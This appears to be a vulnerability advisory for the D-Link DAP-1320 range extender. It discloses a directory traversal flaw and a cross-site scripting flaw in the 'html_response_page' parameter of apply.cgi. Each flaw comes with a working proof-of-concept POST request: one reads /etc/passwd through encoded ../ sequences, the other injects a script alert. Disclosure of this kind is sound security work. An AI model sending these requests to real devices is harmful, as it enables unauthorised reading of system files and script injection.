D-Link DAP-1320 Wireless Range Extender Directory Traversal and
D-Link's DAP-1320 Wireless Range Extender suffers from both a
directory traversal and a XSS vulnerability on all firmware versions.
(current v. 1.20B07)
---------------------------------------------------------------------------=
------------------------------------------
Directory Traversal
CWE-22: Path Traversal
The POST param 'html_response_page' of apply.cgi suffers from a
directory traversal vulnerability.
The following example will display the contents of /etc/passwd:
http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
POST html_response_page=3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.=
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=3D&html_resp=
onse_message=3Djust_login&log_pass=3D&login_n=3Dadmin&action=3Ddo_graph_aut=
h&tmp_log_pass=3DPAN&tmp_log_pass_auth=3DFRIED&graph_code=3D0DEY&session_id=
=3D57687&gcode_base64=3D8TEHPOO%3D
HTTP/1.1
---------------------------------------------------------------------------=
------------------------------------------
XSS
CWE-79: Cross Site Scripting
The POST param 'html_response_page' of apply.cgi suffers from a XSS
vulnerability.
Example:
http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
POST
html_response_page=3D%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3=
E&login_name=3DHuggy&html_response_message=3Djust_login&log_pass=3D&login_n=
=3Dadmin&action=3Ddo_graph_auth&tmp_log_pass=3Dpop&tmp_log_pass_auth=3Dgoes=
&graph_code=3Djoffrey&session_id=3D57687&gcode_base64=3DZZTOPI%3D
HTTP/1.1
---------------------------------------------------------------------------=
------------------------------------------
Vendor Link:
http://support.dlink.com/ProductInfo.aspx?m=3DDAP-1320
Research Contact: K Lovett